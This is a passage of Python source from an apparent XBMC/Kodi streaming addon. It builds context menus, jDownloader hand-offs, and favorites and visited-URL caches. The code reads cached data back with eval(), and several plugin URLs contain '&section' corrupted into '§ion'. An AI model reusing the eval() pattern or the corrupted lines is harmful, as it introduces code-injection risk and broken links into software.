    """
    contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
    try: site=labs['site']
    except: site=addpr('site','')
    try: section=labs['section']
    except: section=addpr('section','')
    try: _subfav=addpr('subfav','')
    except: _subfav=''
    if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Info',ps('cMI.showinfo.url')))
    if labs=={}: return contextMenuItems
    try:
        if _subfav=='': _sf='1'
        else: _sf=_subfav
        WRFC=ps('WhatRFavsCalled')
        LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
        #if _sf is not '1': LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
        #if _sf is not '2': LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
        #if _sf is not '3': LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
        #if _sf is not '4': LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
        #if _sf is not '5': LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
        #if _sf is not '6': LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
        #if _sf is not '7': LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
        LB['mode']='cFavoritesRemove'; LB['subfav']=_subfav; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append(('Remove',Pars)) #'Remove: '+WRFC+addst('fav.tv.'+_sf+'.name'),Pars))
    except: pass
    return contextMenuItems
def ContextMenu_Movies(labs={}):
    """Build the context-menu entries for a movie item.

    Per-settings entries: Movie Info, cross-addon searches (KissAnime,
    Solarmovie.so, 1Channel -- each only when installed), and
    add-to-favorites entries for the first two favorites slots.
    Returns a list of (label, builtin-command) tuples.
    NOTE(review): `labs` is a mutable default -- safe only because it is
    never mutated here.
    """
    contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
    try: site=labs['site']
    except: site=addpr('site','')
    try: section=labs['section']
    except: section=addpr('section','')
    if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Movie Info',ps('cMI.showinfo.url')))
    if labs=={}: return contextMenuItems
    if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
    if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s&section=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','movies',nameonly)))
    if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000&section=%s&query=%s)' % ('plugin://plugin.video.1channel/','movies',nameonly)))
    #if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb'): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s&section=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','movies',urllib.quote_plus('http://merdb.ru/'),nameonly)))
    #if os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms'): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', title, '1')))
    try:
        WRFC=ps('WhatRFavsCalled')
        LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
        LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.1.name'),Pars))
        LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.2.name'),Pars))
        #LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.3.name'),Pars))
        #LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.4.name'),Pars))
        #LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.5.name'),Pars))
        #LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.6.name'),Pars))
        #LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.movies.7.name'),Pars))
    except: pass
    return contextMenuItems
def ContextMenu_Series(labs={},TyP='tv'):
    """Build the context-menu entry list for a TV-series (or movie) listitem.

    labs -- listitem label dict; 'title' is read immediately (see the
    KeyError caveat: the labs=={} guard is only reachable when 'title'
    exists).  TyP -- 'tv' (default) or 'movie', which selects which
    favorites bucket is offered.
    Returns a list of (label, builtin-command) tuples.
    """
    contextMenuItems=[]; nameonly=filename_filter_out_year(labs['title'])
    try: site=labs['site']
    except: site=addpr('site','')
    try: section=labs['section']
    except: section=addpr('section','')
    if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Show Info',ps('cMI.showinfo.url')))
    if labs=={}: return contextMenuItems
    # Cross-addon entries, each gated on a setting plus the target addon
    # being installed under special://home/addons/.
    if (tfalse(addst("CMI_FindAirDates"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Find AirDates', 'XBMC.Container.Update(%s?mode=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','SearchForAirDates',labs['title'])))
    if (tfalse(addst("CMI_SearchKissAnime"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.kissanime')): contextMenuItems.append(('Search KissAnime', 'XBMC.Container.Update(%s?mode=%s&pageno=1&pagecount=1&title=%s)' % ('plugin://plugin.video.kissanime/','Search',nameonly)))
    if (tfalse(addst("CMI_SearchSolarMovieso"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.solarmovie.so')): contextMenuItems.append(('Search Solarmovie.so', 'XBMC.Container.Update(%s?mode=%s§ion=%s&title=%s)' % ('plugin://plugin.video.solarmovie.so/','Search','tv',nameonly)))
    if (tfalse(addst("CMI_Search1Channel"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.1channel')): contextMenuItems.append(('Search 1Channel', 'XBMC.Container.Update(%s?mode=7000§ion=%s&query=%s)' % ('plugin://plugin.video.1channel/','tv',nameonly)))
    if (tfalse(addst("CMI_SearchMerDBru"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.merdb')): contextMenuItems.append(('Search MerDB', 'XBMC.Container.Update(%s?mode=%s§ion=%s&url=%s&title=%s)' % ('plugin://plugin.video.merdb/','Search','tvshows',urllib.quote_plus('http://merdb.ru/tvshow/'),nameonly)))
    if (tfalse(addst("CMI_SearchIceFilms"))==True) and (os.path.exists(xbmc.translatePath("special://home/addons/") + 'plugin.video.icefilms')): contextMenuItems.append(('Search Icefilms','XBMC.Container.Update(%s?mode=555&url=%s&search=%s&nextPage=%s)' % ('plugin://plugin.video.icefilms/', 'http://www.icefilms.info/', labs['title'], '1')))
    # Favorites add/remove toggle: if the title is already stored in the
    # bucket the entry becomes a 'Remove: ...' action, otherwise an add.
    try:
        WRFC=ps('WhatRFavsCalled'); WRFCr='Remove: '
        LB=DoLabs2LB(labs); McFA='cFavoritesAdd'; McFR='cFavoritesRemove'; LB['mode']=McFA; P1='XBMC.RunPlugin(%s)'
        #LB['mode']=McFA; LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
        LB['subfav']='1';
        if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Films - Movies'; #addst('fav.tv.'+LB['subfav']+'.name');
        else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
        if TyP=='movie':
            LB['subfav']=''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
        else:
            for nn in ['2']: #,'3','4','5','6','7']:
                LB['subfav']=nn;
                if fav__COMMON__check(LB['site'],LB['section'],LB['title'],LB['year'],LB['subfav'])==True: LB['mode']=McFR; LabelName=WRFCr+WRFC+'Seriale - TV Shows'; #addst('fav.tv.'+LB['subfav']+'.name');
                else: LB['mode']=McFA; LabelName=WRFC+addst('fav.tv.'+LB['subfav']+'.name');
                Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
        #LB['mode']=McFA; LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
        #LB['mode']=McFA; LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
        #LB['mode']=McFA; LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
        #LB['mode']=McFA; LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
        #LB['mode']=McFA; LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
        # NOTE(review): the bare ``LB['year']`` below is a no-op expression
        # (the value is read and discarded) -- probably a leftover edit.
        if (tfalse(addst("CMI_RefreshMetaData","true"))==True): LB['mode']='refresh_meta'; LabelName='Refresh MetaData'; LB['imdb_id']=LB['commonid']; LB['alt_id']='imdbnum'; LB['video_type']='tvshow'; LB['year']; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((LabelName,Pars));
    except: pass
    return contextMenuItems
def ContextMenu_Episodes(labs={}):
    """Build context-menu entries for an episode listitem.

    Only an 'Episode Info' entry is offered, and only when the
    CMI_ShowInfo addon setting is enabled.
    """
    entries = []
    if tfalse(addst("CMI_ShowInfo")) == True:
        entries.append(('Episode Info', ps('cMI.showinfo.url')))
    return entries
def ContextMenu_Hosts(labs={},contextMenuItems=[]):
    """Build context-menu entries for a hosted-video listitem.

    labs -- listitem label dict; 'url' (and optionally 'destfile') are
    read.  The contextMenuItems parameter is ignored: it is immediately
    rebound to a fresh list, which also avoids the mutable-default trap.
    Returns a list of (label, builtin-command) tuples.
    """
    contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
    #if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Host Info',ps('cMI.showinfo.url')))
    if labs=={}: return contextMenuItems
    # Two jDownloader hand-off flavors: resolved link vs. raw page url.
    if tfalse(addst("CMI_JDownloaderResolver"))==True: contextMenuItems.append(('JDownloader (UrlResolver)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'true')))
    if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'false')))
    # Direct download entry only when a target filename is known AND a
    # default download folder has been configured.
    if ('destfile' in labs) and (len(addst('download_folder_default','')) > 0):
        contextMenuItems.append(('Download','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',urllib.quote_plus(labs['url']),'true',urllib.quote_plus(addst('download_folder_default','')),urllib.quote_plus(labs['destfile']) ) ))
    #elif ('title' in labs) and (len(addst('download_folder_default','')) > 0):
    return contextMenuItems
def ContextMenu_LiveStreams(labs={},contextMenuItems=[]):
    """Build context-menu entries for a live-stream listitem.

    Offers a 'Stream Info' entry (setting-gated) plus "add to favorites"
    entries for all seven tv sub-favorite buckets.  The
    contextMenuItems parameter is ignored (rebound to a fresh list).
    Returns a list of (label, builtin-command) tuples.
    """
    contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
    try: site=labs['site']
    except: site=addpr('site','')
    try: section=labs['section']
    except: section=addpr('section','')
    if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Stream Info',ps('cMI.showinfo.url')))
    if labs=={}: return contextMenuItems
    # Best-effort favorites entries; any failure silently skips the rest.
    try:
        WRFC=ps('WhatRFavsCalled')
        LB=DoLabs2LB(labs); LB['mode']='cFavoritesAdd'; P1='XBMC.RunPlugin(%s)'
        LB['subfav']= ''; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.1.name'),Pars))
        LB['subfav']='2'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.2.name'),Pars))
        LB['subfav']='3'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.3.name'),Pars))
        LB['subfav']='4'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.4.name'),Pars))
        LB['subfav']='5'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.5.name'),Pars))
        LB['subfav']='6'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.6.name'),Pars))
        LB['subfav']='7'; Pars=P1 % _addon.build_plugin_url(LB); contextMenuItems.append((WRFC+addst('fav.tv.7.name'),Pars))
    except: pass
    return contextMenuItems
def ContextMenu_VideoUrls(labs={},contextMenuItems=[]):
    """Build context-menu entries for a raw video-url listitem.

    labs -- listitem label dict; 'url' is read when non-empty.
    The contextMenuItems parameter is ignored (rebound to a fresh list).
    Returns a list of (label, builtin-command) tuples.
    """
    contextMenuItems=[] #; nameonly=filename_filter_out_year(labs['title'])
    #if tfalse(addst("CMI_ShowInfo"))==True: contextMenuItems.append(('Url Info',ps('cMI.showinfo.url')))
    if labs=={}: return contextMenuItems
    # Bug fix: the mode was misspelled 'toJDowfnloader', which could never
    # match the 'toJDownloader' mode used by ContextMenu_Hosts above.
    if tfalse(addst("CMI_JDownloader"))==True: contextMenuItems.append(('JDownloader (Url)','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s)' % ('plugin://'+ps('addon_id')+'/','toJDownloader',urllib.quote_plus(labs['url']),'false')))
    #contextMenuItems.append(('Downloader','XBMC.RunPlugin(%s?mode=%s&url=%s&useResolver=%s&destpath=%s&destfile=%s)' % ('plugin://'+ps('addon_id')+'/','Download',labs['url'],'false','','')))
    return contextMenuItems
def ContextMenu_ImageUrls(labs={},contextMenuItems=[]):
    """Context-menu entries for an image-url listitem.

    Only a setting-gated 'Url Info' entry is offered; the
    contextMenuItems parameter is ignored (a fresh list is returned).
    """
    entries = []
    if tfalse(addst("CMI_ShowInfo")) == True:
        entries.append(('Url Info', ps('cMI.showinfo.url')))
    return entries
def ContextMenu_AudioUrls(labs={},contextMenuItems=[]):
    """Context-menu entries for an audio-url listitem.

    Only a setting-gated 'Url Info' entry is offered; the
    contextMenuItems parameter is ignored (a fresh list is returned).
    """
    entries = []
    if tfalse(addst("CMI_ShowInfo")) == True:
        entries.append(('Url Info', ps('cMI.showinfo.url')))
    return entries
def ContextMenu_AudioStreams(labs={},contextMenuItems=[]):
    """Context-menu entries for an audio-stream listitem.

    Only a setting-gated 'Url Info' entry is offered; the
    contextMenuItems parameter is ignored (a fresh list is returned).
    """
    entries = []
    if tfalse(addst("CMI_ShowInfo")) == True:
        entries.append(('Url Info', ps('cMI.showinfo.url')))
    return entries
def ContextMenu_AudioRadioStreams(labs={},contextMenuItems=[]):
    """Context-menu entries for an audio radio-stream listitem.

    Only a setting-gated 'Url Info' entry is offered; the
    contextMenuItems parameter is ignored (a fresh list is returned).
    """
    entries = []
    if tfalse(addst("CMI_ShowInfo")) == True:
        entries.append(('Url Info', ps('cMI.showinfo.url')))
    return entries
def XBMC_RunPlugin(plugId,plugParams,plugFile=''):
    """Fire XBMC.RunPlugin for the given plugin id, optional file and query string."""
    command = "XBMC.RunPlugin(plugin://%s/%s?%s)" % (plugId, plugFile, plugParams)
    xbmc.executebuiltin(command)
def XBMC_ContainerUpdate(plugId,plugParams,plugFile=''):
    """Fire XBMC.Container.Update for the given plugin id, optional file and query string."""
    command = "XBMC.Container.Update(plugin://%s/%s?%s)" % (plugId, plugFile, plugParams)
    xbmc.executebuiltin(command)
### ############################################################################################################
### ############################################################################################################
def SendTo_JDownloader(url,useResolver=True):
    """Hand *url* to the jDownloader addon via XBMC.RunPlugin.

    When useResolver is True the url is first resolved to a direct media
    link through the urlresolver addon; any failure (missing module,
    unresolvable host) silently falls back to the raw url.
    """
    myNote('Download','sending to jDownloader plugin',15000)
    if useResolver==True:
        try:
            import urlresolver
            link=urlresolver.HostedMediaFile(url).resolve()
        except: link=url
    else: link=url
    xbmc.executebuiltin("XBMC.RunPlugin(plugin://plugin.program.jdownloader/?action=addlink&url=%s)" % link)
    # Best-effort resolve of the current plugin invocation; presumably so
    # XBMC stops waiting for a playable item -- TODO confirm intent.
    try: _addon.resolve_url(url)
    except: pass
### ############################################################################################################
### ############################################################################################################
#import c_Extract as extract #extract.all(lib,addonfolder,dp)
#import c_HiddenDownloader as downloader #downloader.download(url,destfile,destpath,useResolver=True)
def ExtractThis(filename,destpath):
    """Extract the archive *filename* into *destpath* without a progress dialog."""
    import c_Extract as _extractor
    return _extractor.allNoProgress(filename, destpath)
def DownloadThis(url,destfile,destpath,useResolver=True):
    """Download *url* to destpath/destfile via the hidden downloader.

    When useResolver is True the url is first resolved through the
    urlresolver addon; any failure falls back to the raw url.
    """
    destpath = xbmc.translatePath(destpath)
    import c_HiddenDownloader as downloader
    debob(str(useResolver))
    link = url
    if useResolver == True:
        try:
            import urlresolver
            link = urlresolver.HostedMediaFile(url).resolve()
        except:
            link = url
    deb('downloadable url', link)
    downloader.download(link, destfile, destpath, useResolver)
### ############################################################################################################
### ############################################################################################################
# Thin one-line wrappers around xbmc.executebuiltin() for common XBMC
# built-in commands.
def XBMC_RefreshRSS(): xbmc.executebuiltin("XBMC.RefreshRSS()")
def XBMC_EjectTray(): xbmc.executebuiltin("XBMC.EjectTray()")
def XBMC_Mute(): xbmc.executebuiltin("XBMC.Mute()")
def XBMC_System_Exec(url): xbmc.executebuiltin("XBMC.System.Exec(%s)" % url)  # run external program
def XBMC_System_ExecWait(url): xbmc.executebuiltin("XBMC.System.ExecWait(%s)" % url)  # run and wait for completion
def XBMC_PlayDVD(): xbmc.executebuiltin("XBMC.PlayDVD()")
def XBMC_ReloadSkin(): xbmc.executebuiltin("XBMC.ReloadSkin()")
def XBMC_UpdateAddonRepos(): xbmc.executebuiltin("XBMC.UpdateAddonRepos()")
def XBMC_UpdateLocalAddons(): xbmc.executebuiltin("XBMC.UpdateLocalAddons()")
def XBMC_Weather_Refresh(): xbmc.executebuiltin("XBMC.Weather.Refresh()")
def XBMC_ToggleDebug(): xbmc.executebuiltin("XBMC.ToggleDebug()")
def XBMC_Minimize(): xbmc.executebuiltin("XBMC.Minimize()")
def XBMC_ActivateScreensaver(): xbmc.executebuiltin("XBMC.ActivateScreensaver()")
### ############################################################################################################
### ############################################################################################################
def fav__COMMON__empty(site,section,subfav=''):
    """Wipe every saved favorite in the site/section/subfav cache bucket and notify the user."""
    WhereAmI('@ Favorites - Empty - %s%s' % (section,subfav))
    wiped = []
    cache.set('favs_'+site+'__'+section+subfav+'__', str(wiped))
    myNote(bFL('Favorites'),bFL('Your Favorites Have Been Wiped Clean. Bye Bye.'))
def fav__COMMON__remove(site,section,name,year,subfav=''):
    """Remove the favorite matching *name* and *year* from the given cache bucket.

    Favorites are stored as the str() of a list of 14-tuples; the match
    is exact on both name and year.  On success the entry is removed,
    the bucket re-saved, the user notified and the container refreshed;
    otherwise a 'not found' note is shown.
    NOTE(review): list membership is scanned via eval() of cached text --
    data is written by this addon, but consider ast.literal_eval.
    """
    WhereAmI('@ Favorites - Remove - %s%s' % (section,subfav)); deb('fav__remove() '+section,name+' ('+year+')'); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); tf=False
    if saved_favs:
        favs=eval(saved_favs)
        if favs:
            # Remove-then-return inside the loop is safe: iteration stops
            # immediately after the mutation.
            for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
                if (name==_name) and (year==_year): favs.remove((_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2)); cache.set('favs_'+site+'__'+section+subfav+'__', str(favs)); tf=True; myNote(bFL(name.upper()+' ('+year+')'),bFL('Removed from Favorites')); deb(name+' ('+year+')','Removed from Favorites. (Hopefully)'); xbmc.executebuiltin("XBMC.Container.Refresh"); return
            if (tf==False): myNote(bFL(name.upper()),bFL('not found in your Favorites'))
        else: myNote(bFL(name.upper()+' ('+year+')'),bFL('not found in your Favorites'))
def fav__COMMON__add(site,section,name,year='',img=_artIcon,fanart=_artFanart,subfav='',plot='',commonID='',commonID2='',ToDoParams='',Country='',Genres='',Url=''):
    """Append a favorite (14-tuple) to the site/section/subfav cache bucket.

    Duplicate detection is by exact name AND year; if a duplicate is
    found the user is notified and nothing is written.  Otherwise the
    new tuple is appended and the bucket re-saved as str(list).
    """
    debob(['fav__add()',section,name+' ('+year+')',img,fanart]); WhereAmI('@ Favorites - Add - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]; fav_found=False
    if saved_favs:
        #debob(saved_favs)
        favs=eval(saved_favs)
        if favs:
            #debob(favs)
            # Bail out early when the (name, year) pair is already stored.
            for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
                if (name==_name) and (year==_year):
                    fav_found=True;
                    if len(year) > 0: myNote(bFL(section+': '+name.upper()+' ('+year+')'),bFL('Already in your Favorites'));
                    else: myNote(bFL(section+': '+name.upper()),bFL('Already in your Favorites'));
                    return
    #
    deb('Adding Favorite',site+' - '+section+' - '+subfav)
    debob(['name',name,'year',year,'img',img,'fanart',fanart,'Country',Country,'Url',Url,'plot',plot,'Genres',Genres,'site',site,'subfav',subfav,'section',section,'ToDoParams',ToDoParams,'commonID',commonID,'commonID2',commonID2])
    favs.append((name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2))
    ##if (section==ps('section.tvshows')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],_param['dbid']))
    ##elif (section==ps('section.movie')): favs.append((name,year,img,fanart,_param['country'],_param['url'],_param['plot'],_param['genre'],''))
    ##else: myNote('Favorites: '+section,'Section not Found')
    #
    cache.set('favs_'+site+'__'+section+subfav+'__', str(favs));
    if len(year) > 0: myNote(bFL(name+' ('+year+')'),bFL('Added to Favorites'))
    else: myNote(bFL(name),bFL('Added to Favorites'))
    #
def fav__COMMON__list_fetcher(site,section='',subfav=''):
    """Return the favorites list for the given cache bucket, or '' when empty.

    The stored list of tuples is sorted by (year, name) descending.
    Returns a list of 14-tuples on success; the empty string '' when the
    bucket is missing or holds an empty list (callers test truthiness).
    """
    WhereAmI('@ Favorites - List - %s%s' % (section,subfav)); saved_favs=cache.get('favs_'+site+'__'+section+subfav+'__'); favs=[]
    if saved_favs:
        # fav[1] is the year, fav[0] the name -- newest first.
        debob('saved_favs found'); debob(saved_favs); favs=sorted(eval(saved_favs), key=lambda fav: (fav[1],fav[0]),reverse=True); ItemCount=len(favs)
        if favs:
            debob('favs found'); debob(favs);
            return favs
            ## tuple layout: (name,year,img,fanart,Country,Url,plot,Genres,site,subfav,section,ToDoParams,commonID,commonID2)
        else: return ''
    else: return ''
    #
def fav__COMMON__check(site,section,name,year,subfav=''):
    """Return True when *name* already exists in the favorites bucket.

    Matching is by name only -- the year argument is accepted but ignored.
    """
    saved_favs = cache.get('favs_'+site+'__'+section+subfav+'__')
    if not saved_favs:
        return False
    favs = eval(saved_favs)  # NOTE(review): eval of cached text written by this addon
    if not favs:
        return False
    for (_name,_year,_img,_fanart,_country,_url,_plot,_Genres,_site,_subfav,_section,_ToDoParams,_commonID,_commonID2) in favs:
        #if (name==_name) and (year==_year): return True
        if (name==_name): return True
    return False
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
### ############################################################################################################
def filename_filter_out_year(name=''):
    """Strip every ' (YYYY)' year suffix from *name* and trim whitespace.

    e.g. 'Alien (1979)' -> 'Alien'.  Names without a parenthesised
    digit run are returned unchanged (modulo the final strip()).
    """
    # A single re.sub replaces the original findall-then-replace loop;
    # the pattern still requires the leading space before '('.
    return re.sub(r' \(\d+\)', '', name).strip()
def filename_filter_colorcodes(name=''):
    """Strip the XBMC label-formatting tags this addon uses from *name*.

    Only the exact tag spellings the original handled are removed (e.g.
    both '[color lime]' and '[COLOR lime]', but only uppercase
    '[COLOR green]'); the result is whitespace-stripped.
    """
    # str.replace() is a no-op when the tag is absent, so the per-tag
    # 'in' guards of the original were redundant.
    for tag in ('[/color]', '[/COLOR]',
                '[color lime]', '[COLOR lime]', '[COLOR green]',
                '[COLOR yellow]', '[COLOR red]',
                '[b]', '[B]', '[/b]', '[/B]',
                '[cr]', '[CR]',
                '[i]', '[I]', '[/i]', '[/I]',
                '[uppercase]', '[UPPERCASE]',
                '[lowercase]', '[LOWERCASE]'):
        name = name.replace(tag, '')
    return name.strip()
def Download_PrepExt(url,ext='.flv'):
    """Guess a file extension for *url*; fall back to *ext* when none match.

    Candidates are tested as plain substrings, in the same priority
    order as before: archives, images, video, then other types.
    """
    known_extensions = ('.zip', '.rar', '.z7',
                        '.png', '.jpg', '.gif', '.bmp', '.jpeg',
                        '.mp4', '.mpeg', '.avi', '.flv', '.wmv',
                        '.mp3', '.txt')
    for candidate in known_extensions:
        if candidate in url:
            return candidate
    return ext
### ############################################################################################################
### ############################################################################################################
def visited_DoCheck(urlToCheck,s='[B][COLOR yellowgreen]@[/COLOR][/B] ',e='[COLOR black]@[/COLOR] '):
    """Return marker *s* when *urlToCheck* was visited before, else marker *e*."""
    return s if visited_check(urlToCheck) else e
def visited_check(urlToCheck):
    """Return True when *urlToCheck* is an exact member of the visited-url cache."""
    try:
        saved_visits = cache.get('visited_')
    except Exception:  # cache unavailable -> treat as never visited
        return False
    # A missing entry or the serialized empty list both mean "no visits".
    # (The unused erNoFavs notification string from the original was dead
    # code and has been removed.)
    if (not saved_visits) or (saved_visits == '[]'):
        return False
    # NOTE(review): eval of cached text; the data is written by this addon,
    # but ast.literal_eval would be the safer choice.
    visits = eval(saved_visits)
    return urlToCheck in visits
def visited_check2(urlToCheck):
    """Return True when *urlToCheck* occurs as a substring of any visited entry."""
    try:
        saved_visits = cache.get('visited_')
    except:
        return False
    erNoFavs='XBMC.Notification([B][COLOR orange]Favorites[/COLOR][/B],[B]You have no favorites saved.[/B],5000,"")'
    if not saved_visits:
        return False
    if saved_visits == '[]':
        return False
    entries = eval(saved_visits)
    return any(urlToCheck in entry for entry in entries)
def visited_empty():
    """Reset the visited-url cache to an empty list and notify the user."""
    saved_favs = cache.get('visited_')  # read kept from the original (result unused)
    cache.set('visited_', str([]))
    notification('[B][COLOR orange]Visited[/COLOR][/B]','[B] Your Visited Data has been wiped clean. Bye Bye.[/B]')
def visited_remove(urlToRemove):
    """Remove *urlToRemove* from the visited-url cache, if present.

    The cache entry is the str() of a list of url strings.  Removal is
    by exact match; the function returns immediately after the first
    hit, so mutating the list during iteration is safe here.
    """
    saved_visits = cache.get('visited_')
    visits = []
    if saved_visits:
        visits = eval(saved_visits)
        if visits:
            #print visits; print urlToRemove
            for (title) in visits:
                if (urlToRemove==title):
                    visits.remove((urlToRemove));
                    cache.set('visited_', str(visits))
                    #RefreshList();
                    return
def visited_add(urlToAdd):
    """Append *urlToAdd* to the visited-url cache unless already present.

    Empty-string and None inputs are ignored (returns '').
    """
    if urlToAdd == '':
        return ''
    if urlToAdd == None:
        return ''
    deb('checking rather url has been visited',urlToAdd)
    previous = cache.get('visited_')
    entries = eval(previous) if previous else []
    if entries and (urlToAdd in entries):
        return
    entries.append(urlToAdd)
    cache.set('visited_', str(entries))
def wwCMI(cMI,ww,t):
    """Append watched-state context-menu entries to *cMI* and return it.

    ww==7 -> the item is marked: offer 'Unmark' and 'Empty Visits';
    ww==6 -> the item is unmarked: offer 'Mark'.  t is the item title.
    """
    run_plugin = 'XBMC.RunPlugin(%s)'
    site = addpr("site")
    section = addpr("section")
    if ww == 7:
        cMI.append(("Unmark", run_plugin % _addon.build_plugin_url({'mode':'RemoveVisit','title':t,'site':site,'section':section})))
        cMI.append(("Empty Visits", run_plugin % _addon.build_plugin_url({'mode':'EmptyVisit','site':site,'section':section})))
    elif ww == 6:
